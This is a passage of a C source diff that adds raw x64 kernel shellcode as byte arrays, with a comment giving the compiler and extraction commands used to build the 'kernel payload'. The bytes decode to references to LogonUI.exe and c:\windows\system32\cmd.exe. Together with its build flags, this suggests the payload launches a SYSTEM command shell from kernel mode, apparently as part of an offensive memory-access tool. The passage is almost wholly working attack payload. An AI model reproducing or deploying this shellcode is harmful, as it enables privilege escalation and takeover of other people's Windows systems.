+		0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7,
+		0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45, 0x17, 0x9b, 0x97, 0x64,
+		0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8, 0xc7, 0x45, 0x1f, 0x3d,
+		0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0, 0x35, 0x30, 0xc7, 0x45,
+		0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b, 0x61, 0x4c, 0x04, 0x5d,
+		0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7, 0x45, 0x33, 0xb8, 0xd4,
+		0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0, 0x6f, 0xc7, 0x45, 0x3b,
+		0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde, 0x24, 0xe6, 0xf7, 0xc7,
+		0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45, 0x47, 0x36, 0x31, 0x0e,
+		0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+		0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+		0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90, 0x00, 0x00, 0x00, 0x49,
+		0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d,
+		0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
+		0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+		0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
+		0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
+		0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
+		0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
+		0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
+		0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
+		0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
+		0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
+		0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
+		0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
+		0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
+		0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
+		0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
+		0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
+		0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7
+	};
+	*ppb = WINX64_VFS_BIN;
+	*pcb = sizeof(WINX64_VFS_BIN);
+}
+
+// specially compiled kernel payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel wx64_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel /D_PSCMD /D_PSCMD_SYSTEM /D_EXEC_USER_EXTERNAL wx64_pscreate.c
+// ml64 wx64_common_a.asm /Fewx64_pscmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main wx64_pscreate.obj wx64_common.obj
+// shellcode64.exe -o wx64_pscmd.exe
+// xxd -i wx64_pscmd.bin
+VOID GetData_PSCMD_KERNEL(PBYTE *ppb, PDWORD pcb)
+{
+	BYTE WINX64_PSCMD_KERNEL_BIN[] = {
+		0x56, 0x48, 0x8b, 0xf4, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x20,
+		0xe8, 0x7b, 0x06, 0x00, 0x00, 0x48, 0x8b, 0xe6, 0x5e, 0xc3, 0x0f, 0x20,
+		0xd8, 0xc3, 0x0f, 0x09, 0xc3, 0xcc, 0xcc, 0xcc, 0x40, 0x55, 0x53, 0x56,
+		0x57, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8d, 0x6c, 0x24, 0xd9,
+		0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xb9, 0x20, 0x01,
+		0x00, 0x00, 0x48, 0x8b, 0xf2, 0x48, 0x83, 0x65, 0x7f, 0x00, 0x48, 0x8d,
+		0x55, 0x7f, 0x48, 0x83, 0x65, 0x77, 0x00, 0x48, 0x8b, 0xd9, 0x45, 0x33,
+		0xf6, 0x48, 0xc7, 0x45, 0x97, 0x00, 0x10, 0x00, 0x00, 0x4c, 0x21, 0x75,
+		0x67, 0x49, 0x8b, 0xcf, 0x49, 0x8b, 0xf8, 0x41, 0xff, 0x50, 0x58, 0x48,
+		0x63, 0xc8, 0x41, 0xbd, 0x00, 0x00, 0x00, 0xc0, 0x8b, 0xc1, 0x41, 0x23,
+		0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+		0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
+		0xe9, 0xc1, 0x01, 0x00, 0x00, 0xba, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d,
+		0x4d, 0xf7, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0xba, 0x10, 0x00, 0x00,
+		0x00, 0x48, 0x8d, 0x4d, 0x9f, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c,
+		0x21, 0x75, 0xa7, 0x4c, 0x8d, 0x4d, 0x9f, 0x4c, 0x8d, 0x45, 0xf7, 0x4c,
+		0x89, 0x7d, 0x9f, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x8d, 0x4d, 0x67,
+		0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x48, 0x63, 0xc8, 0x8b, 0xc1, 0x41,
+		0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20, 0x02,
+		0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x04, 0x00, 0x00,
+		0x00, 0xe9, 0x45, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x4c, 0x8d,
+		0x4d, 0x97, 0xc7, 0x44, 0x24, 0x28, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d,
+		0x55, 0x77, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
+		0x00, 0x30, 0x00, 0x00, 0xff, 0x57, 0x78, 0x48, 0x63, 0xc8, 0x8b, 0xc1,
+		0x41, 0x23, 0xc5, 0x41, 0x3b, 0xc5, 0x75, 0x17, 0x48, 0x89, 0x8b, 0x20,
+		0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x05, 0x00,
+		0x00, 0x00, 0xe9, 0xfc, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x7f, 0x48,
+		0x8d, 0x55, 0xb7, 0xff, 0x57, 0x18, 0x4c, 0x39, 0xb3, 0x30, 0x01, 0x00,
+		0x00, 0x74, 0x38, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcb,
+		0xe8, 0x3f, 0x04, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75,
+		0x22, 0x48, 0xc7, 0x83, 0x20, 0x02, 0x00, 0x00, 0x05, 0x40, 0x00, 0x80,
+		0x48, 0x8d, 0x4d, 0xb7, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00, 0x06,
+		0x00, 0x00, 0x00, 0xff, 0x57, 0x20, 0xe9, 0xb0, 0x00, 0x00, 0x00, 0x4c,
+		0x8b, 0x4d, 0x77, 0x4c, 0x8b, 0xc7, 0x48, 0x8b, 0xd6, 0x4c, 0x89, 0x74,
+		0x24, 0x20, 0x48, 0x8b, 0xcb, 0xe8, 0x16, 0x03, 0x00, 0x00, 0x8b, 0xc8,
+		0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x48, 0x8d, 0x4d, 0xb7, 0x75, 0x16,
+		0x48, 0x98, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83,
+		0x28, 0x02, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0xeb, 0xbd, 0xff, 0x57,
+		0x20, 0x4c, 0x8b, 0x57, 0x68, 0x4d, 0x85, 0xd2, 0x74, 0x69, 0x48, 0x8b,
+		0x4d, 0x67, 0x48, 0x8d, 0x45, 0xe7, 0x48, 0x89, 0x44, 0x24, 0x48, 0x45,
+		0x33, 0xc9, 0x48, 0x8d, 0x45, 0xaf, 0x45, 0x33, 0xc0, 0x48, 0x89, 0x44,
+		0x24, 0x40, 0x33, 0xd2, 0x48, 0x83, 0x64, 0x24, 0x38, 0x00, 0x48, 0x8b,
+		0x45, 0x77, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x83, 0x64, 0x24, 0x28,
+		0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x41, 0xff, 0xd2, 0x8b, 0xc8,
+		0x41, 0x23, 0xcd, 0x41, 0x3b, 0xcd, 0x75, 0x16, 0x48, 0x98, 0x48, 0x89,
+		0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+		0x0a, 0x00, 0x00, 0x00, 0xeb, 0x0d, 0xba, 0xfa, 0x00, 0x00, 0x00, 0x48,
+		0x8b, 0xce, 0xe8, 0x61, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x67, 0x48,
+		0x85, 0xc9, 0x74, 0x06, 0xff, 0x96, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
+		0x4d, 0x7f, 0x48, 0x85, 0xc9, 0x74, 0x03, 0xff, 0x57, 0x48, 0x48, 0x81,
+		0xc4, 0xe0, 0x00, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x5f,
+		0x5e, 0x5b, 0x5d, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+		0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83,
+		0xec, 0x40, 0x4c, 0x8b, 0xe2, 0x48, 0x8b, 0xf1, 0x33, 0xd2, 0x4d, 0x8b,
+		0xf1, 0x4d, 0x8b, 0xf8, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x45, 0x33, 0xc0,
+		0x8d, 0x5a, 0x05, 0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x3d,
+		0x04, 0x00, 0x00, 0xc0, 0x0f, 0x85, 0xb2, 0x00, 0x00, 0x00, 0x8b, 0x4c,
+		0x24, 0x70, 0x85, 0xc9, 0x0f, 0x84, 0xa6, 0x00, 0x00, 0x00, 0x8b, 0xd1,
+		0x33, 0xc9, 0xff, 0x56, 0x08, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75,
+		0x0a, 0xb8, 0x0e, 0x00, 0x07, 0x80, 0xe9, 0x8d, 0x00, 0x00, 0x00, 0x44,
+		0x8b, 0x44, 0x24, 0x70, 0x4c, 0x8d, 0x4c, 0x24, 0x70, 0x48, 0x8b, 0xd7,
+		0x8b, 0xcb, 0xff, 0x96, 0xa8, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x85, 0xc0,
+		0x78, 0x6a, 0x48, 0x8b, 0xdf, 0xba, 0x10, 0x00, 0x00, 0x00, 0x48, 0x8d,
+		0x4c, 0x24, 0x30, 0xff, 0x96, 0x80, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x43,
+		0x50, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x41, 0xb9, 0x10, 0x00, 0x00, 0x00,
+		0x48, 0x89, 0x44, 0x24, 0x20, 0x49, 0x8b, 0xd4, 0x48, 0x8b, 0xce, 0xe8,
+		0x5c, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8d, 0x4c, 0x24, 0x30,
+		0xff, 0x16, 0x85, 0xc0, 0x74, 0x23, 0x8b, 0x03, 0x85, 0xc0, 0x74, 0x16,
+		0x48, 0x03, 0xd8, 0x48, 0x3b, 0xdf, 0x72, 0x1c, 0x8b, 0x44, 0x24, 0x70,
+		0x48, 0x03, 0xc7, 0x48, 0x3b, 0xd8, 0x73, 0x10, 0xeb, 0xa7, 0xbd, 0x9f,
+		0x13, 0x07, 0x80, 0xeb, 0x07, 0x48, 0x8b, 0x43, 0x50, 0x49, 0x89, 0x06,
+		0x48, 0x8b, 0xcf, 0xff, 0x56, 0x10, 0x8b, 0xc5, 0x4c, 0x8d, 0x5c, 0x24,
+		0x40, 0x49, 0x8b, 0x5b, 0x38, 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3,
+		0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0x5f, 0x5e, 0xc3, 0xcc, 0xcc, 0xcc,
+		0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57,
+		0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf2, 0x4c, 0x8b, 0xf1,
+		0x48, 0x8d, 0x54, 0x24, 0x48, 0x49, 0x8b, 0xc8, 0x49, 0x8b, 0xe9, 0xff,
+		0x56, 0x58, 0x8b, 0xf8, 0x85, 0xc0, 0x78, 0x23, 0x48, 0x8b, 0x4c, 0x24,
+		0x48, 0xff, 0x56, 0x50, 0x48, 0x8b, 0xc8, 0x48, 0x8b, 0xd5, 0x48, 0x8b,
+		0xd8, 0xff, 0x56, 0x70, 0x48, 0x8b, 0x4c, 0x24, 0x60, 0x48, 0x8b, 0xd3,
+		0x4c, 0x8b, 0xc0, 0x41, 0xff, 0x56, 0x60, 0x48, 0x8b, 0x5c, 0x24, 0x40,
+		0x8b, 0xc7, 0x48, 0x8b, 0x6c, 0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41,
+		0x5e, 0x5f, 0x5e, 0xc3, 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48,
+		0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c, 0x89, 0x70, 0x20, 0x55,
+		0x48, 0x8b, 0xec, 0x48, 0x83, 0xec, 0x70, 0x4c, 0x8b, 0xf1, 0xc7, 0x45,
+		0xb0, 0x5d, 0xc6, 0x94, 0xfb, 0xc7, 0x45, 0xb4, 0xa3, 0x8d, 0x98, 0x2b,
+		0x48, 0x8d, 0xba, 0x88, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8, 0xf9, 0x95,
+		0xc6, 0x88, 0x48, 0x8d, 0x75, 0xf4, 0xc7, 0x45, 0xbc, 0xbe, 0x47, 0x00,
+		0x9e, 0xbb, 0x11, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xc0, 0xf4, 0xdc, 0x47,
+		0xf0, 0xc7, 0x45, 0xc4, 0xbc, 0x1e, 0x36, 0x9f, 0xc7, 0x45, 0xc8, 0x92,
+		0xf5, 0x45, 0x13, 0xc7, 0x45, 0xcc, 0xcd, 0x1d, 0xeb, 0xbc, 0xc7, 0x45,
+		0xd0, 0x2b, 0x0e, 0xd0, 0x97, 0xc7, 0x45, 0xd4, 0xd6, 0x3f, 0x05, 0x2e,
+		0xc7, 0x45, 0xd8, 0xec, 0xee, 0xe7, 0x8b, 0xc7, 0x45, 0xdc, 0x2a, 0xb8,
+		0xa0, 0xa3, 0xc7, 0x45, 0xe0, 0x0d, 0x0e, 0x0b, 0x0e, 0xc7, 0x45, 0xe4,
+		0x41, 0x20, 0x2f, 0x44, 0xc7, 0x45, 0xe8, 0xa8, 0x3b, 0xfb, 0xe0, 0xc7,
+		0x45, 0xec, 0xed, 0x4a, 0x3d, 0xd3, 0xc7, 0x45, 0xf0, 0x60, 0x9d, 0xd0,
+		0xf0, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce, 0x8b, 0x16, 0x48, 0x8d,
+		0x7f, 0xf8, 0xe8, 0x49, 0x04, 0x00, 0x00, 0x48, 0x89, 0x07, 0x83, 0xc3,
+		0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x5c, 0x24, 0x70, 0x49, 0x8b, 0x5b, 0x10,
+		0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28,
+		0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+		0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
+		0x89, 0x78, 0x20, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec,
+		0x20, 0x4c, 0x8b, 0x71, 0x68, 0x4c, 0x8d, 0xa1, 0x00, 0x04, 0x00, 0x00,
+		0x4c, 0x89, 0xb1, 0x80, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc6, 0x25, 0xff,
+		0x0f, 0x00, 0x00, 0x41, 0xbf, 0x00, 0x10, 0x00, 0x00, 0x44, 0x2b, 0xf8,
+		0x48, 0x8b, 0xfa, 0x4c, 0x89, 0xb9, 0x88, 0x00, 0x00, 0x00, 0x48, 0xb8,
+		0x66, 0x66, 0x77, 0x77, 0x66, 0x66, 0x77, 0x77, 0x48, 0x89, 0x41, 0x78,
+		0x48, 0x8b, 0xd9, 0x49, 0x8b, 0x06, 0xba, 0x04, 0x01, 0x00, 0x00, 0x48,
+		0x89, 0x81, 0x88, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe9, 0x49, 0x8b, 0xcc,
+		0x41, 0xff, 0x50, 0x70, 0x48, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x57, 0x00,
+		0x07, 0x80, 0xeb, 0x47, 0xba, 0x00, 0x10, 0x00, 0x00, 0x48, 0x8b, 0xcd,
+		0xff, 0x97, 0x80, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xc7, 0x49, 0x8b, 0xd6,
+		0x48, 0x8b, 0xcd, 0xff, 0x57, 0x60, 0x41, 0xb8, 0x04, 0x01, 0x00, 0x00,
+		0x48, 0x8d, 0x8d, 0xe8, 0x0e, 0x00, 0x00, 0x49, 0x8b, 0xd4, 0xff, 0x57,
+		0x60, 0x8b, 0x83, 0x28, 0x01, 0x00, 0x00, 0x89, 0x85, 0xf8, 0x0f, 0x00,
+		0x00, 0x48, 0x8b, 0x44, 0x24, 0x60, 0x48, 0x89, 0x85, 0xf0, 0x0f, 0x00,
+		0x00, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+		0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+		0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5c, 0xc3, 0xcc, 0xcc,
+		0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+		0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x41, 0x56, 0x48, 0x83, 0xec,
+		0x30, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xe9, 0x41, 0xbe, 0x00, 0x20, 0x00,
+		0x00, 0x33, 0xc9, 0x41, 0x8b, 0xd6, 0x49, 0x8b, 0xf0, 0xff, 0x53, 0x08,
+		0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x07, 0x33, 0xc0, 0xe9, 0x90,
+		0x00, 0x00, 0x00, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x93, 0x80,
+		0x00, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x20, 0x00, 0x45, 0x33, 0xc9,
+		0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x16, 0x4c,
+		0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x08, 0x48, 0x8b, 0xcf, 0xff, 0x53,
+		0x10, 0xeb, 0xc9, 0x33, 0xd2, 0x49, 0x8b, 0xce, 0x44, 0x8d, 0x42, 0x02,
+		0xff, 0x56, 0x40, 0x45, 0x33, 0xc9, 0xc7, 0x44, 0x24, 0x28, 0x10, 0x00,
+		0x00, 0x00, 0x83, 0x64, 0x24, 0x20, 0x00, 0x49, 0x8b, 0xce, 0x45, 0x8d,
+		0x41, 0x01, 0x41, 0x8a, 0xd0, 0xff, 0x56, 0x38, 0x48, 0x8b, 0xf0, 0x48,
+		0x85, 0xc0, 0x74, 0xc7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x30, 0x48, 0x8d,
+		0x8e, 0x00, 0x10, 0x00, 0x00, 0x48, 0x89, 0x85, 0x18, 0x01, 0x00, 0x00,
+		0xff, 0x53, 0x30, 0x48, 0x89, 0x85, 0x18, 0x02, 0x00, 0x00, 0x48, 0x8b,
+		0xc6, 0x48, 0x89, 0xbd, 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0xb5, 0x38,
+		0x02, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24,
+		0x48, 0x48, 0x8b, 0x74, 0x24, 0x50, 0x48, 0x8b, 0x7c, 0x24, 0x58, 0x48,
+		0x83, 0xc4, 0x30, 0x41, 0x5e, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
+		0x08, 0x55, 0x48, 0x8d, 0xac, 0x24, 0x50, 0xff, 0xff, 0xff, 0x48, 0x81,
+		0xec, 0xb0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xd9, 0x48, 0x8d, 0x55, 0xe0,
+		0x48, 0x8b, 0x49, 0x08, 0xe8, 0x13, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x4b,
+		0x08, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xe8, 0x1d, 0xfd, 0xff, 0xff, 0xb8,
+		0x01, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x4c, 0x6f, 0x67, 0x6f,
+		0x4c, 0x8d, 0x8b, 0x20, 0x01, 0x00, 0x00, 0x48, 0x89, 0x83, 0x30, 0x01,
+		0x00, 0x00, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x89, 0x83, 0x40, 0x01,
+		0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x50, 0xc7, 0x44, 0x24, 0x24, 0x6e,
+		0x55, 0x49, 0x2e, 0x48, 0x8d, 0x4d, 0xe0, 0xc7, 0x44, 0x24, 0x28, 0x65,
+		0x78, 0x65, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x63, 0x3a, 0x5c, 0x77, 0xc7,
+		0x44, 0x24, 0x34, 0x69, 0x6e, 0x64, 0x6f, 0xc7, 0x44, 0x24, 0x38, 0x77,
+		0x73, 0x5c, 0x73, 0xc7, 0x44, 0x24, 0x3c, 0x79, 0x73, 0x74, 0x65, 0xc7,
+		0x44, 0x24, 0x40, 0x6d, 0x33, 0x32, 0x5c, 0xc7, 0x44, 0x24, 0x44, 0x63,
+		0x6d, 0x64, 0x2e, 0xc7, 0x44, 0x24, 0x48, 0x65, 0x78, 0x65, 0x00, 0x48,
+		0xc7, 0x83, 0x28, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0xe8, 0x21,
+		0xfb, 0xff, 0xff, 0x48, 0x63, 0xc8, 0x48, 0x89, 0x8b, 0x20, 0x02, 0x00,
+		0x00, 0x85, 0xc0, 0x74, 0x0d, 0x48, 0xc7, 0x83, 0x28, 0x02, 0x00, 0x00,
+		0x01, 0x01, 0x00, 0x00, 0xeb, 0x26, 0x48, 0x8d, 0x8b, 0x00, 0x04, 0x00,
+		0x00, 0x41, 0xb8, 0x1c, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30,
+		0xff, 0x55, 0x40, 0x4c, 0x8d, 0x44, 0x24, 0x50, 0x48, 0x8b, 0xcb, 0x48,
+		0x8d, 0x55, 0xe0, 0xe8, 0x98, 0xf8, 0xff, 0xff, 0x48, 0x8b, 0x9c, 0x24,
+		0xc0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x01, 0x00, 0x00, 0x5d,
+		0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x8b, 0xc2, 0x4c, 0x8d,
+		0x44, 0x24, 0x30, 0x48, 0x69, 0xd0, 0xf0, 0xd8, 0xff, 0xff, 0x4c, 0x8b,
+		0xc9, 0x33, 0xc9, 0x48, 0x89, 0x54, 0x24, 0x30, 0x33, 0xd2, 0x41, 0xff,
+		0x51, 0x20, 0x48, 0x83, 0xc4, 0x28, 0xc3, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
+		0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+		0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+		0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+		0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+		0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+		0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
+		0x00, 0x00, 0xc7, 0x45, 0xf7, 0x92, 0x6d, 0x58, 0x58, 0xc7, 0x45, 0xfb,
+		0xce, 0xad, 0x90, 0x4d, 0xc7, 0x45, 0xff, 0x57, 0x63, 0x32, 0x5a, 0xc7,
+		0x45, 0x03, 0x8f, 0xb5, 0x6a, 0x6a, 0xc7, 0x45, 0x07, 0xf9, 0xbe, 0xdd,
+		0x05, 0xc7, 0x45, 0x0b, 0xf7, 0x38, 0xb3, 0x9d, 0xc7, 0x45, 0x0f, 0xc9,
+		0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0x13, 0x89, 0x83, 0x6c, 0xeb, 0xc7, 0x45,
+		0x17, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0x1b, 0x2a, 0xc0, 0xb2, 0xa8,
+		0xc7, 0x45, 0x1f, 0x3d, 0x28, 0xc3, 0x7c, 0xc7, 0x45, 0x23, 0x2a, 0xd0,
+		0x35, 0x30, 0xc7, 0x45, 0x27, 0xdb, 0x4f, 0x3d, 0xc5, 0xc7, 0x45, 0x2b,
+		0x61, 0x4c, 0x04, 0x5d, 0xc7, 0x45, 0x2f, 0x9d, 0x8f, 0xa0, 0xc3, 0xc7,
+		0x45, 0x33, 0xb8, 0xd4, 0x29, 0x88, 0xc7, 0x45, 0x37, 0x50, 0x64, 0xb0,
+		0x6f, 0xc7, 0x45, 0x3b, 0xe2, 0xca, 0x61, 0xe6, 0xc7, 0x45, 0x3f, 0xde,
+		0x24, 0xe6, 0xf7, 0xc7, 0x45, 0x43, 0x16, 0x35, 0xfd, 0x87, 0xc7, 0x45,
+		0x47, 0x36, 0x31, 0x0e, 0x68, 0x48, 0x8d, 0x76, 0xfc, 0x49, 0x8b, 0xce,
+		0x8b, 0x16, 0x48, 0x8d, 0x7f, 0xf8, 0xe8, 0x25, 0x00, 0x00, 0x00, 0x48,
+		0x89, 0x07, 0x83, 0xc3, 0xff, 0x75, 0xe6, 0x4c, 0x8d, 0x9c, 0x24, 0x90,
+		0x00, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
+		0x8b, 0x7b, 0x20, 0x4d, 0x8b, 0x73, 0x28, 0x49, 0x8b, 0xe3, 0x5d, 0xc3,
